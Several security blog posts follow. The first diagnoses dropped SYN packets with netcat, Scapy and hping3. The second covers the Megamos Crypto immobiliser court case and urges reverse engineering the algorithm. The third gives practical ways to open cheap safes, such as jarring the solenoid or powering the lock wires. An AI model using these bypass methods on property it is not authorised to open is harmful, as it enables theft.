. * . . * . . * . . . * . . . . 31 / 128
* . . * . . . * . . * . . . * . 36 / 144
* . . . . . . * * . . . . . . * 40 / 160
. . . . . . * * . . . . . . * . 43 / 176
. . . . . * * . . . . . . * . . 46 / 192
. . . . * * . . . . . . * . . . 49 / 208
* . . . . . . * * . . . . . . * 53 / 224
. . . . . . . * * . . . . . . * 56 / 240
* . . . . . . * * . . . . . . * 60 / 256

What can we note?

  • There is some vague pattern there, often repeating every 8 packets.
  • The proportion of failed connections is consistently around 25%.
  • Varying the WAITTIME (the time between connections) had some interesting effects. With short times, the patterns were regular. With longer times they seemed less regular.
  • Using the laptop for other things would disrupt the pattern, but the failure rate stayed at around 25%, even with very little other traffic.

What varies over time, following a pattern, but would show behaviour like this?

The source port.

Every TCP connection has not only a destination port but also a source port – typically in the range of 1025 to 65535. The source port is incremented for each connection made. So the first time I telnet it might be 45323, the next time 45324, then 45325 and so on. Other applications share the same series of source ports and increment it as they make connections.

When I run the test program with a short wait time, there is very little chance for other applications to increment the source port. When I run it with a longer wait time (30s or so), many other applications will increment the source port, causing the pattern to be inconsistent.

It really looked like certain source ports were failing to get through to the server.
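You can watch the operating system pick source ports with a few lines of Python: connect repeatedly to a throwaway listener on the loopback interface and record the local port of each connection. This is only a sketch; whether the ports come out sequential depends on the OS and its settings (many modern systems randomise them), so don't expect it to reproduce the OS X behaviour described above.

```python
import socket


def observe_source_ports(count=5):
    """Connect `count` times to a throwaway listener on 127.0.0.1 and return
    the source port the OS assigned to each connection."""
    ports = []
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as listener:
        listener.bind(("127.0.0.1", 0))  # port 0: let the OS pick a free port
        listener.listen(count)
        address = listener.getsockname()
        for _ in range(count):
            with socket.create_connection(address, timeout=2) as client:
                ports.append(client.getsockname()[1])
                server_side, _peer = listener.accept()
                server_side.close()
    return ports
```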

netcat

I had to test this theory. You can’t control the source port with telnet, but you can with the excellent netcat (or nc, as the command is named). “-p” controls the source port:

andrew@andrews-mbp:/$ nc -p 1025 212.120.12.189 1494
ICA^C
andrew@andrews-mbp:/$ nc -p 1026 212.120.12.189 1494
^C
andrew@andrews-mbp:/$ nc -p 1027 212.120.12.189 1494
ICA^C
andrew@andrews-mbp:/$ nc -p 1025 212.120.12.189 1494
ICA^C
andrew@andrews-mbp:/$ nc -p 1026 212.120.12.189 1494
^C
andrew@andrews-mbp:/$ nc -p 1027 212.120.12.189 1494
ICA^C

As you can see, connections from 1025 and 1027 always succeed and 1026 always fails. I tested many other ports as well. We have our culprit!
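The same test can be scripted in Python without netcat: socket.create_connection accepts a source_address, which binds the local end to a chosen port before connecting. A sketch, with connect_from_port being my own name. Reusing a source port immediately can fail with "address already in use" while the previous connection lingers in TIME_WAIT, so that error is deliberately raised rather than counted as a failed probe.

```python
import socket


def connect_from_port(rhost, rport, sport, timeout=2.0):
    """Try a TCP connection to rhost:rport from local port `sport` (like `nc -p sport`).
    True if the handshake completes; False if it times out or is refused."""
    try:
        with socket.create_connection((rhost, rport), timeout=timeout,
                                      source_address=("", sport)):
            return True
    except (socket.timeout, ConnectionRefusedError):
        return False
    # Other OSErrors (e.g. EADDRINUSE from a lingering TIME_WAIT) propagate
```

Calling connect_from_port("212.120.12.189", 1494, sport) for sport in 1025, 1026 and 1027 mirrors the nc runs above.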

Python and Scapy

Now, can we spot a pattern in the ports that are failing and those that are succeeding? Maybe. I needed something to craft TCP/IP packets to test this out. I could use netcat and a bash script, but I’ve recently learnt about Scapy, a packet manipulation module for Python. It’s incredibly flexible but also very quick and easy to use. I learnt about it after reading the book Violent Python, which I would recommend if you want to get started quickly using Python for some real-world security testing.

The script needs to connect to the same destination port from a range of source ports and record the results. Half an hour later, with Scapy, I had this (note: I did have some issues with Scapy and OS X that I will need to go over in another post):

# Must be run as root: Scapy sends raw packets
import time
from scapy.all import IP, TCP, sr1

RHOST = '212.120.12.189'
RPORT = 80                   # destination port under test (the ICA port is 1494)
LPORT_LOW = 1025
LPORT_HIGH = LPORT_LOW + 128

RED = '\033[0;31m'           # ANSI escape: red text
NORMAL = '\033[0m'           # ANSI escape: reset to default colour

for port in range(LPORT_LOW, LPORT_HIGH):
    ip = IP(dst=RHOST)
    # TCP() sets the SYN flag by default
    tcp = TCP(dport=RPORT, sport=port)

    # Build the packet by layering TCP on top of IP
    send_packet = ip/tcp

    # Send the packet and wait for a single response - aggressive timeout to speed up tests
    recv_packet = sr1(send_packet, timeout=0.1, verbose=0)

    # Red for failed tests, normal for success
    colour_start = RED if recv_packet is None else NORMAL

    # Show source port in decimal, hex and binary to spot patterns
    print(colour_start + str(port) + ':' + format(port, '#04x') + ':' + format(port, '016b') + NORMAL)

    time.sleep(0.01)

This produced really helpful output, with the failed ports printed in red (the colour does not survive in the excerpts below):

1025:0x401:0000010000000001
1026:0x402:0000010000000010
1027:0x403:0000010000000011
1028:0x404:0000010000000100
1029:0x405:0000010000000101
1030:0x406:0000010000000110
1031:0x407:0000010000000111
1032:0x408:0000010000001000
1033:0x409:0000010000001001
1034:0x40a:0000010000001010
1035:0x40b:0000010000001011
1036:0x40c:0000010000001100
1037:0x40d:0000010000001101
1038:0x40e:0000010000001110
1039:0x40f:0000010000001111
1040:0x410:0000010000010000
1041:0x411:0000010000010001
1042:0x412:0000010000010010
1043:0x413:0000010000010011
1044:0x414:0000010000010100
1045:0x415:0000010000010101
1046:0x416:0000010000010110
1047:0x417:0000010000010111
1048:0x418:0000010000011000

At this point in the port range, it appears that ports whose binary form ends in 001 or 110 are failing.

1128:0x468:0000010001101000
1129:0x469:0000010001101001
1130:0x46a:0000010001101010
1131:0x46b:0000010001101011
1132:0x46c:0000010001101100
1133:0x46d:0000010001101101
1134:0x46e:0000010001101110
1135:0x46f:0000010001101111
1136:0x470:0000010001110000
1137:0x471:0000010001110001
1138:0x472:0000010001110010
1139:0x473:0000010001110011
1140:0x474:0000010001110100
1141:0x475:0000010001110101
1142:0x476:0000010001110110
1143:0x477:0000010001110111
1144:0x478:0000010001111000
1145:0x479:0000010001111001
1146:0x47a:0000010001111010
1147:0x47b:0000010001111011
1148:0x47c:0000010001111100
1149:0x47d:0000010001111101
1150:0x47e:0000010001111110
1151:0x47f:0000010001111111

Move further down the port range and ports ending in 000 or 111 are failing.

In fact, at any given point it seems that the packets failing are either 000/111, 001/110, 010/101, 011/100 – complements of one another. Higher order bits seem to determine which pair is going to fail.

Curious!
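The complement relationship is easy to check mechanically: two 3-bit values are complements exactly when their XOR is 0b111. A small Python sketch; the function names are mine, and the port list in the note below is not measured data but is reconstructed from the "ending in 001 or 110" description of the first excerpt.

```python
def low_bits(ports, width=3):
    """Set of the lowest `width` bits of each port number."""
    mask = (1 << width) - 1
    return {port & mask for port in ports}


def is_complement_pair(a, b, width=3):
    """True if a and b are bitwise complements within `width` bits, e.g. 0b001 and 0b110."""
    mask = (1 << width) - 1
    return a ^ b == mask
```

In the first excerpt, the ports matching that description are 1025, 1030, 1033, 1038, 1041 and 1046; low_bits of those gives {1, 6}, and is_complement_pair(1, 6) is True.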

What makes this even stranger is that changing the destination port (say, from 1494 to 80) gives you a different series of working/non-working source ports. 1025 works for 1494, but not 80. 1026 works for both. 1027 works only for 80.

All of my tests above have been done on my laptop over an internet connection. I wanted to test a local machine as well to narrow down the area the problem could be in – is it the perimeter firewall or the switch the server is connected to?

hping3

The local test machine is a Linux box which is missing Python but has hping3 on it. This is another useful tool that allows packets to be created with a great degree of flexibility. In many respects it feels like a combination of netcat and ping.

admin@NTPserver:~$ sudo hping3 10.168.40.189 -s 1025 -S -i u100000 -c 20 -p 1494

What does all this mean?

  • First parameter is the IP to connect to.
  • -s is the start of the source port range – hping3 will increment this by 1 each time unless -k is passed
  • -S means set the SYN flag (similar to the Scapy test above)
  • -i u100000 means wait 100000 µs (0.1 s) between each ping
  • -c 20 means send 20 pings
  • -p 1494 is the offending port to connect to

And what do we get back?

--- 10.168.40.189 hping statistic ---
20 packets transmitted, 16 packets received, 20% packet loss
round-trip min/avg/max = 0.3/0.4/0.8 ms

The same sort of packet loss we were seeing before. Oddly, the source ports that work differ from this Linux box to my laptop.

Here’s where it gets even stranger. I then decided to try padding the SYN out with some data (which I think is valid for TCP, though I’ve never seen a real app do it and mtr’s man page says it isn’t). You use -d 1024 to append 1024 bytes of data. I first tried 1024 bytes and had 20% packet loss as before. Then I tried 2048 bytes:

--- 10.168.40.189 hping statistic ---
20 packets transmitted, 20 packets received, 0% packet loss
round-trip min/avg/max = 0.5/0.6/0.9 ms

Wait? All the packets are now getting through?

Through a process of trial and error, I found that anything with more than 1460 bytes of data was getting through fine. 1460 bytes of data + 20 bytes TCP header + 20 bytes IP header = 1500 bytes, which is the Ethernet MTU (Maximum Transmission Unit). Anything up to this size can be sent in a single Ethernet frame; anything bigger needs to be split into IP fragments carried in multiple frames (although some Ethernet networks allow jumbo frames, which are much bigger – this one doesn’t).
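The arithmetic is worth spelling out. When an IP datagram is too big for the MTU it is split into fragments, each carrying at most the MTU minus the 20-byte IP header, rounded down to a multiple of 8 bytes (1480 bytes for a 1500-byte MTU). A Python sketch, assuming a bare 20-byte TCP header with no options and no IP options:

```python
def fragment_payloads(ip_payload, mtu=1500, ip_header=20):
    """Bytes of IP payload carried by each fragment when a datagram is split to fit `mtu`.
    Every fragment except the last must carry a multiple of 8 bytes."""
    if ip_payload + ip_header <= mtu:
        return [ip_payload]  # fits in one frame: no fragmentation
    per_fragment = (mtu - ip_header) // 8 * 8  # 1480 for a 1500-byte MTU
    sizes = []
    while ip_payload > 0:
        size = min(per_fragment, ip_payload)
        sizes.append(size)
        ip_payload -= size
    return sizes


TCP_HEADER = 20  # assumption: a SYN with no TCP options
for data in (1024, 1460, 1461, 2048):
    print(data, fragment_payloads(data + TCP_HEADER))
# 1024 [1044]
# 1460 [1480]
# 1461 [1480, 1]
# 2048 [1480, 588]
```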

I then ran the hping3 test from my laptop and found that altering the data size had no impact on packet loss. I strongly suspect that this is because a router or firewall along the way is reassembling the fragments to inspect them and then sending them on in a different form.

At this point I installed the Broadcom Advanced Control Suite (BACS) on the server to see if I could see any further diagnostics or statistics to help. One thing quickly stood out – a counter labelled “Out of recv. buffer” was counting up almost in proportion to the number of SYN packets getting lost:

[Screenshot: BACS statistics]

This doesn’t sound like a desirable thing. It turns out the driver is quite out of date – maybe I should have started here!

Conclusion

I’m still not sure what is going on here. The packets being rejected do seem to follow some kind of pattern, but it’s certainly not regular enough to blame it on the intentional behaviour of a firewall.

At this point we are going to try upgrading the drivers for the network card on the server and see if this fixes the issue.

The point of all of the above is to show how quick and easy it can be to use readily available tools to investigate network issues.

Reverse engineering Megamos Crypto?

Some of you might have read the stories going around a few weeks ago – “Scientist banned from revealing codes used to start luxury cars”. The short of it is that a security researcher has had an injunction imposed on him, preventing him from publishing a paper. The paper reveals security problems in the Megamos Crypto system used in the immobiliser system of many cars. Volkswagen are not happy – it really seems they want this shut down.

(As an aside, I hate the way that mainstream media refers to “codes” – it can mean source code, executables, an algorithm, or even a secret key, and these meanings are often used interchangeably in the same article.)

Details were a little scant, but last night the EFF passed comment, based on the court’s decision.

I am not a lawyer – I’m not going to pass judgement on the legal side. But what is interesting is how the researchers got hold of the Megamos Crypto algorithm. It wasn’t by decapping the chips in the transponders, it wasn’t from observing them black-box, it wasn’t from looking at an embedded software implementation – they took a Windows program used to clone car key transponders and reverse engineered that.

In terms of working out how Megamos was implemented, someone else had already done the hard work. This left the researchers to perform detailed cryptanalysis of the algorithm and – rumour has it – find some serious problems.

The piece of software is called “Tango Programmer”, a third-party tool (software and hardware) used to make transponders. This has been available since at least 2009.

Tango Programmer is readily available, but it appears that it needs to be bought alongside a physical programmer. I strongly suspect that the software would be available on file sharing sites illegally, or possibly even legitimately on another site if you look hard enough.

Another company, Bicotech, produce a similar tool called RwProg. The software is downloadable from their website. The executable is packed, but I am sure it would be perfectly possible to reverse engineer the algorithm from the binary.

The court decision itself contains valuable information on Megamos as well, notably from paragraphs 4 and 5:

In detail the way this works is as follows: both the car computer and the transponder know a secret number. The number is unique to that car. It is called the “secret key”. Both the car computer and the transponder also know a secret algorithm. That is a complex mathematical formula. Given two numbers it will produce a third number. The algorithm is the same for all cars which use the Megamos Crypto chip. Carrying out that calculation is what the Megamos Crypto chip does.

When the process starts the car generates a random number. It is sent to the transponder. Now both computers perform the complex mathematical operation using two numbers they both should know, the random number and the secret key. They each produce a third number. The number is split into two parts called F and G. Both computers now know F and G. The car sends its F to the transponder. The transponder can check that the car has correctly calculated F. That proves to the transponder that the car knows both the secret key and the Megamos Crypto algorithm. The transponder can now be satisfied that the car is genuinely the car it is supposed to be. If the transponder is happy, the transponder sends G to the car. The car checks that G is correct. If it is correct then the car is happy that the transponder also knows the secret key and the Megamos Crypto algorithm. Thus the car can be satisfied that the transponder is genuine. So both devices have confirmed the identity of the other without actually revealing the secret key or the secret algorithm. The car can safely start. The verification of identity in this process depends on the shared secret knowledge. For the process to be secure, both pieces of information need to remain secret – the key and the algorithm.

In standard cryptography terminology:

A car $\text{C}$ and a transponder $\text{T}$ share a secret key $K$. A pseudo-random function family $\textsf{PRF}$ is keyed using key $K$, i.e. $\textsf{PRF}_K$. The output from this PRF is split into two parts $F$ and $G$.

  1. $\text{C}$ generates a random number $r$.
  2. $\text{C}$ calculates $(F, G) = \textsf{PRF}_K(r)$.
  3. $\text{C} \to \text{T}: r, F$
  4. $\text{T}$ calculates $(F', G') = \textsf{PRF}_K(r)$.
  5. $\text{T}$ checks that $F = F'$.
  6. $\text{T} \to \text{C}: G'$
  7. $\text{C}$ checks that $G = G'$.

This process means that the transponder believes the car knows the key and PRF, and the car believes the transponder knows the key and PRF. They should have authenticated themselves with each other.
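The seven steps can be run end to end in a short simulation. The sketch below uses HMAC-SHA256 as a stand-in PRF, which is an assumption made purely for illustration: it is not Megamos Crypto. The 64-bit size of $r$ is also invented. Everything except the key is public here, which is the situation a sound PRF is meant to survive.

```python
import hashlib
import hmac
import secrets
from typing import Optional

# Stand-in PRF: HMAC-SHA256. This is NOT Megamos Crypto; any sound PRF
# would do for this sketch.


def prf(key: bytes, r: bytes) -> tuple[bytes, bytes]:
    """Compute PRF_K(r) and split the 32-byte output into (F, G)."""
    out = hmac.new(key, r, hashlib.sha256).digest()
    return out[:16], out[16:]


class Transponder:
    def __init__(self, key: bytes) -> None:
        self._key = key

    def respond(self, r: bytes, f: bytes) -> Optional[bytes]:
        f_prime, g_prime = prf(self._key, r)        # step 4
        if not hmac.compare_digest(f, f_prime):     # step 5
            return None                             # car failed to prove itself
        return g_prime                              # step 6


def car_authenticates(car_key: bytes, transponder: Transponder) -> bool:
    r = secrets.token_bytes(8)                      # step 1 (64-bit r is an assumption)
    f, g = prf(car_key, r)                          # step 2
    g_prime = transponder.respond(r, f)             # steps 3 to 6
    return g_prime is not None and hmac.compare_digest(g, g_prime)  # step 7


key = secrets.token_bytes(12)
print(car_authenticates(key, Transponder(key)))
print(car_authenticates(key, Transponder(secrets.token_bytes(12))))
```

The first call should succeed because both sides hold the same key. The second should fail because the transponder's key differs, so it rejects the car's $F$ at step 5.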

What is a PRF? A pseudo-random function is similar in many respects to a pseudo-random number generator (PRNG), except that instead of generating output sequentially, you can access any of the outputs directly using an index (r in the example above). The key is analogous to the seed of the PRNG. For a given key, each input always maps to the same output.
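The difference in access pattern can be shown in a few lines. This sketch uses Python's `random.Random` as an example PRNG and HMAC-SHA256 as an example PRF. Both are illustrative choices, not what Megamos uses, and `random.Random` is not suitable for cryptography.

```python
import hashlib
import hmac
import random


def prng_nth(seed: int, n: int) -> int:
    """PRNG: to reach output n you have to generate outputs 0..n-1 first."""
    rng = random.Random(seed)  # not cryptographic; only shows the access pattern
    for _ in range(n):
        rng.getrandbits(32)
    return rng.getrandbits(32)


def prf(key: bytes, index: int) -> bytes:
    """PRF (HMAC-SHA256 as a stand-in): jump straight to any index."""
    return hmac.new(key, index.to_bytes(8, "big"), hashlib.sha256).digest()


# The same seed/key and the same position always give the same output.
assert prng_nth(42, 1000) == prng_nth(42, 1000)
assert prf(b"secret key", 1000) == prf(b"secret key", 1000)
# Different keys give unrelated outputs for the same index.
print(prf(b"secret key", 7).hex())
print(prf(b"another key", 7).hex())
```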

Importantly, the output of a PRF should be indistinguishable to an observer from a random function, and by extension you should not be able to derive the key even if you are given inputs, outputs, or free access to the function. You should also not be able to tell which PRF is in use even if you can control the inputs and read the outputs.

So – if this is a secure, solid, verified PRF, the protocol should be secure, even if we know what the PRF is. The only thing that needs to be kept secret is the key.

But the court decision says:

The verification of identity in this process depends on the shared secret knowledge. For the process to be secure, both pieces of information need to remain secret – the key and the algorithm.

This suggests one of two things:

  1. The PRF used is not secure
  2. They don’t know what they are talking about

Both are entirely possible, but I would strongly suspect that the PRF has issues and they want to keep it secret. This would be a clear example of “security through obscurity”.

How could a PRF be insecure?

  • Using one or more input/output pairs, it might be possible to derive the key.
  • You might not need a key to derive the output given the input.
  • The key length might not be long enough to prevent bruteforcing.
  • F and G might not depend on the whole key i.e. you might be able to calculate G given part of the key.
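The last bullet is worth making concrete. Below is a deliberately broken toy function (hypothetical, invented for illustration, not Megamos). It uses a 96-bit key, but G depends on only 16 of those bits. Brute-forcing those 16 bits from one overheard exchange is enough to compute G for any future challenge, even though the full key is far too large to search.

```python
import hashlib
import secrets

# A deliberately broken toy "PRF", invented for illustration only.
# F depends on the whole 96-bit key, but G depends on just its low 16 bits.


def toy_f(key: int, r: int) -> bytes:
    data = b"F" + key.to_bytes(12, "big") + r.to_bytes(8, "big")
    return hashlib.sha256(data).digest()[:8]


def toy_g(key_low16: int, r: int) -> bytes:
    data = b"G" + key_low16.to_bytes(2, "big") + r.to_bytes(8, "big")
    return hashlib.sha256(data).digest()[:8]


def toy_prf(key: int, r: int) -> tuple[bytes, bytes]:
    return toy_f(key, r), toy_g(key & 0xFFFF, r)


def recover_g_bits(r: int, g_seen: bytes) -> list[int]:
    """From one eavesdropped (r, G) pair, try all 2**16 values of the bits G uses."""
    return [k for k in range(1 << 16) if toy_g(k, r) == g_seen]


secret_key = secrets.randbits(96)
r1 = secrets.randbits(64)
candidates = recover_g_bits(r1, toy_prf(secret_key, r1)[1])

# With those 16 bits, a cloned transponder can answer any new challenge,
# as long as it never checks F (which would need the other 80 bits).
r2 = secrets.randbits(64)
forged_g = toy_g(candidates[0], r2)
print(forged_g == toy_prf(secret_key, r2)[1])
```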

The protocol itself might suffer from further issues:

  • There does not appear to be any protection from replay attacks (prevented from being used as a direct vulnerability because the authentication is bidirectional).
  • Is the random number actually random? Does it matter if it isn’t? If values are re-used (i.e. it’s not a nonce), it probably does matter.
  • The transponder can bypass the check for F = F' – it can be a “yes” key. If we don’t need the entire key to compute G, this matters.
  • The key might be constant across an entire line or make of cars. Recover the key from one transponder and there would be no secrets left.
  • The key might be derived from an open piece of information like the car’s VIN
  • The key might be derived from something like the manufacture date/time of the car, massively reducing keyspace
  • Probably a million more things
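The point about re-used random numbers can be simulated. In the hypothetical sketch below, HMAC-SHA256 stands in for the unknown algorithm, and the nonce sizes are invented. An attacker overhears genuine exchanges and records r and G. A fake transponder with no key then ignores F and replays the recorded G whenever the car repeats an r. The bidirectional check only stops this if r never repeats.

```python
import hashlib
import hmac
import random


def prf(key: bytes, r: int) -> tuple[bytes, bytes]:
    """Stand-in PRF (HMAC-SHA256), output split into (F, G)."""
    out = hmac.new(key, r.to_bytes(8, "big"), hashlib.sha256).digest()
    return out[:16], out[16:]


def replay_successes(nonce_bits: int, sniffed: int, attempts: int,
                     seed: int = 1) -> int:
    """Count how often replaying overheard G values fools the car."""
    key = bytes(range(16))                  # the car/transponder secret
    car_rng = random.Random(seed)           # the car's (possibly weak) RNG

    # Phase 1: eavesdrop on genuine unlocks and record r -> G.
    recorded = {}
    for _ in range(sniffed):
        r = car_rng.getrandbits(nonce_bits)
        _, g = prf(key, r)                  # G as sent by the real transponder
        recorded[r] = g

    # Phase 2: a fake transponder with no key ignores F and replays G.
    wins = 0
    for _ in range(attempts):
        r = car_rng.getrandbits(nonce_bits)
        _, expected_g = prf(key, r)         # what the car will check against
        replayed = recorded.get(r)
        if replayed is not None and hmac.compare_digest(replayed, expected_g):
            wins += 1
    return wins


print(replay_successes(nonce_bits=8, sniffed=2000, attempts=100))
print(replay_successes(nonce_bits=64, sniffed=2000, attempts=100))
```

With 8-bit values nearly every attempt succeeds, because 2000 recordings cover almost all 256 possible challenges. With 64-bit values a repeat is practically impossible.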

Let’s look at the attacks described in the court decision.

Firstly, note:

The attacks are not, themselves, trivial things to do. However, they allow someone, especially a sophisticated criminal gang with the right tools, to break the security and steal a car.

This makes it sound like some of these attacks are practical i.e. it won’t take 2 weeks of effort after decapping and reading the key from EEPROM.

Attack 1:

One attack relies on weaknesses in the secret keys that are used in certain cars. That “weak key” weakness arises because certain car makers have used weak secret keys which are easier to guess than they need to be. In effect, it is a bit like using the word “password” for a password.

As I mentioned above, there are a number of situations where the keys chosen might be poor. It might be the case that the researchers need 2 weeks to work out the key given a car and transponder, but then if the same key is used across all cars, it doesn’t really matter.

Attack 2:

Another is concerned with key updates. The details do not matter.

This is very vague. Maybe you can alter or add keys easily if you already have access to the car?

Attack 3:

The third attack relates to weaknesses in the Megamos Crypto algorithm itself. The academics explain this attack in the paper, and, as I say, the paper also sets out the whole of the algorithm. It is these two elements that the claimants seek to prevent publication of. The claimants wish to remove the Megamos Crypto algorithm and information about the attack based on the weakness in it from the paper.

This is where we get to the point that it sounds like the PRF is not secure. It sounds like this attack may take days of work with access to both the car and transponder.

This could be like the insecurities found in KeeLoq. The first step was determining the details of the algorithm. The first few papers detailed weaknesses that meant the protocol was insecure, but the weaknesses could not be exploited in practice. After this, papers were released that detailed faster, more effective attacks, until finally we are at the stage where KeeLoq can be called “broken”.

A quick look at some of the software

I haven’t got hold of Tango Programmer, but I do have RwProg up and running. Here is a screenshot:

[Screenshot: RwProg v2.17.0002]

What can we tell from this? Well, the crypto key looks to be 96 bits long – too long to bruteforce.
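To put “too long to bruteforce” into numbers, the sketch below works out the time needed to try every 96-bit key. It contrasts this with the keyspace-reduction case listed earlier, where the key is derived from the manufacture date/time. The guess rates and the 10-year window are assumptions picked for illustration. Real speeds depend on how costly the algorithm is to evaluate, and a long key does not help if the algorithm itself is weak (Attack 3).

```python
SECONDS_PER_YEAR = 365.25 * 24 * 3600


def years_to_exhaust(keyspace: float, guesses_per_second: float) -> float:
    """Worst-case time, in years, to try every key at a given guess rate."""
    return keyspace / guesses_per_second / SECONDS_PER_YEAR


# Assumed attacker speed: one trillion key guesses per second.
print(f"{years_to_exhaust(2**96, 1e12):.2e} years for a full 96-bit key")

# Hypothetical weak derivation: the key is fixed by the car's manufacture
# time to the second, anywhere within a 10-year window.
timestamp_keys = 10 * SECONDS_PER_YEAR
print(f"{timestamp_keys:.2e} candidate keys, "
      f"{timestamp_keys / 1e6:.0f} seconds at a million guesses per second")
```

Even at the generous assumed rate, the full keyspace takes roughly 2.5 billion years. The timestamp-derived key falls in about five minutes at a far slower rate.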

There are a few videos as well:

http://www.youtube.com/watch?v=SKTMawm5Ffw

http://www.youtube.com/watch?v=EX4FuK1JUEE

Nothing really groundbreaking. I can’t see how the software reads and then writes the crypto key.

Conclusion

Regardless of the court decision, it looks like there is enough information out there for other people to start work on this. Download the software, maybe buy Tango Programmer, reverse the algorithm and then let the world loose on it!

 

A newbie’s guide to safes, both opening and using

Firstly, a disclaimer – I’m not a safe cracker. I just know quite a few people who do work on safes and probably know more than the average person.

On Reddit a few months ago, a post appeared from user dont_stop_me_smee showing pictures of a large vault in a friend’s rented property. This garnered a lot of attention, partly riding off the back of the much older “vault in disused casino” popularity. Needless to say, OP did not deliver, and the vault is still closed.

As a result of this post, a new subreddit was set up called “WhatsInThisThing”:

This subreddit is a place for anyone who has acquired a safe, piggy bank, briefcase, treasure chest, oak barrel, thumb drive, bottle, locker, storage unit, abandoned home, bomb shelter, antique can, maybe even a confidential file to post pictures of the adventure of finding out what’s inside it.

There have been a lot of safes posted since then, ranging from modern £20 B&Q specials up to vintage monsters.

There has also been a lot of crap posted about safes and how to open them.

I’m writing this post to try and clear up some aspects of safes, both in terms of opening them and using them to improve your own security.

First things first, if you want your safe opened quickly and without damage, call a good safe engineer. If you are in the UK or Europe, I can put you in touch with someone.

Otherwise, read on.

Opening cheap modern safes

There are a lot of cheap modern safes, constructed of sheet steel (or even plastic/cement laminate!), often with digital combination locks or very insecure mechanical locks. These only provide an illusion of security.

How would I open a cheap digital combination lock safe?

  • Find the manual. The safe will have a default code, and could have a reset procedure that can be triggered from outside the safe. Try this first.
  • Call the manufacturer. Some of these safes have reset procedures that you can get from the manufacturer. You will need to prove ownership. Sometimes you need the serial number which will be inside the safe.
  • Try hitting it. A lot of these safes hold the boltwork back using a spring loaded solenoid. If you hit the safe in the right place with a mallet (or even your hand on smaller safes) whilst turning the handle, it bounces the solenoid back enough to allow the safe to open. This works on a surprisingly large number of safes.
  • Pick the override lock. Nearly all of these safes have a mechanical override lock. These are normally cheap wafer locks, which can be picked open easily by locksmiths and hobbyists.
  • Try and activate the code reset button. Many safes have a small button inside the door used to change the combination. I’ve managed to press this button from outside the safe by using a welding rod poked through a mounting hole on the rear of the safe.
  • Take the front panel off and manually activate the solenoid or motor. Some of the cheap safes have all of the electronics outside of the safe. If you remove the front panel, you will often find two wires going through the door. These connect to the solenoid or motor inside the safe. Apply the correct voltage (usually the same as the total voltage of the batteries) and the safe will unlock.
  • Cut the safe open. I’ve not seen one of these resist more than a few minutes with even a small angle grinder. The top or back is normally easiest.

Most of the time, you don’t really care if the safe survives or not, so go to town on it.

Opening bigger and better safes

If you want to try it yourself, you have the following options…

Non-destructively open the lock. There are a number of techniques that can be used to open mechanical combination locks – reading contact points, or brute forcing (trying every combination using a motor). This is a very skilled job. It is also unwise if you don’t know if the lock works or not – hours could be spent trying to open a lock that will never unlock. Matt Blaze has written a great guide on this (and other vulnerabilities) called “Safe Cracking For the Computer Scientist”. If the lock is mechanical, it can be picked.
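Some rough arithmetic shows why motorised brute forcing is slow but not hopeless. The dial size, wheel count, time per attempt and tolerance below are all assumptions for a generic three-wheel lock, not figures for any particular model. Tolerance means the lock accepts a number slightly off the true one. Good modern locks add anti-manipulation features on top of this.

```python
def combinations_to_try(dial_numbers: int, wheels: int, tolerance: int = 0) -> int:
    """Dialling attempts needed to cover every combination.

    If the lock opens when each number is within +/- tolerance of the true
    one, trying every (2 * tolerance + 1)-th number on each wheel suffices.
    """
    step = 2 * tolerance + 1
    per_wheel = -(-dial_numbers // step)  # ceiling division
    return per_wheel ** wheels


def days_needed(attempts: int, seconds_per_attempt: float) -> float:
    return attempts * seconds_per_attempt / 86_400


# Assumed: a 100-number dial, 3 wheels, 5 seconds per dialling attempt.
for tol in (0, 1):
    n = combinations_to_try(100, 3, tol)
    print(f"tolerance +/-{tol}: {n} combinations, {days_needed(n, 5):.1f} days")
```

Under these assumptions, a million combinations take about 58 days of continuous dialling. A tolerance of one number either side cuts this to 39,304 combinations, or a little over two days.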

Drill the safe. If non-destructive entry is not possible, safe engineers will drill the safe. This involves making a small penetration somewhere on the safe and then opening the safe through the hole. Again, this is a skilled job. You need to know exactly where to drill and then how to open the safe. Sometimes you will drill near to the combination lock and use a borescope to read the wheel pack. Sometimes you will drill to access the bolt or fence instead. Many safes have very hard steel called “hardplate” protecting the lock, and this requires a lot of pressure and special drill bits to get through. Most safes have some form of “relocker” – additional spring-loaded bolts that will trigger under attack and hold the boltwork shut. You really don’t want to trigger these as there is no way to unlock them from outside the safe. The small hole that is left can be filled with hardened steel and welded over for repair.

Cut the safe open. This still generally requires skill or knowledge if you don’t want to damage the contents. Angle grinders, punches, concrete breakers, and thermal lances are tools used here. This can be very time consuming and noisy.

Do you see a theme? You generally need to know what you are doing.

Opening a vault

Unless you can make a hole in the wall, floor, or ceiling, you should call a safe engineer.

Old safes vs. new

Most older safes tend to be fairly secure. I believe this is because of two things. Firstly, safes used to be made better, or at least more solidly. Secondly, if an old safe has survived this long and not been opened, it’s either secure or too damn heavy to throw out.

A lot of modern safes are cheap crap. Anything you can buy in B&Q can be cut open in under 10 minutes. But a good, expensive modern safe is a formidable opponent. Modern combination locks are very good – they have extensive “anti manipulation” features. Even low-cost lever locks are hard to pick. Hardplate is very hard and there are advanced composite materials that are difficult to drill or cut through.

What not to do

There is a lot of bad advice floating about.

Don’t cut the external hinges off the door. They aren’t part of the locking mechanism on even the cheapest safes, so you now have a broken safe that is still closed.

Don’t force the handle. Good safes have boltwork that won’t open no matter how much force you apply to the handle. The handle will shear off first or you will break part of the drive mechanism.

Don’t hit the dial or spindle of the combination lock. The combination lock and door have something called a relocker on them. If you trigger this by hitting it, additional spring-loaded bolts will fire and mean that you cannot open the safe even if you unlock the lock. You’ve potentially made an easy job much harder.

Don’t attempt to use thermite. I’m not sure why, but people suggest this. I suspect none of them have made or used thermite. I have. It’s hard to mix correctly, it isn’t cheap, it’s dangerous, and it will destroy the contents of the safe.

Don’t try a plasma cutter. Again, I suspect these people have never used a plasma cutter. They are exceptionally good at cutting through plate. They are no good when you cannot make the cut in one pass (there is nowhere for the slag to go, so it gets blasted back towards you). They will toast the contents. They are expensive and need a lot of compressed air.

Don’t try any other half-cut idea from someone who has no idea what they are doing. Dousing the safe in liquid nitrogen, filling with water and blowing it up etc. all sound like they are a lot more work and cost than just paying a safe engineer.

Don’t think that opening safes is some kind of mystical black art. There are hundreds of people who can open safes. The more expensive and secure the safe, the fewer people there are who can open it. But there is no safe that cannot be opened.

Don’t think that the safe will have anything exciting in it. They very rarely do.

What do you need in a safe?

After reading all of that, you’ve decided you need a safe. What should you look for?

  • Consider the difference between a key and a combination. A combination can be copied trivially, but it is also easy to share. A key is harder to copy but useless if left near the safe. Which works better for your users?
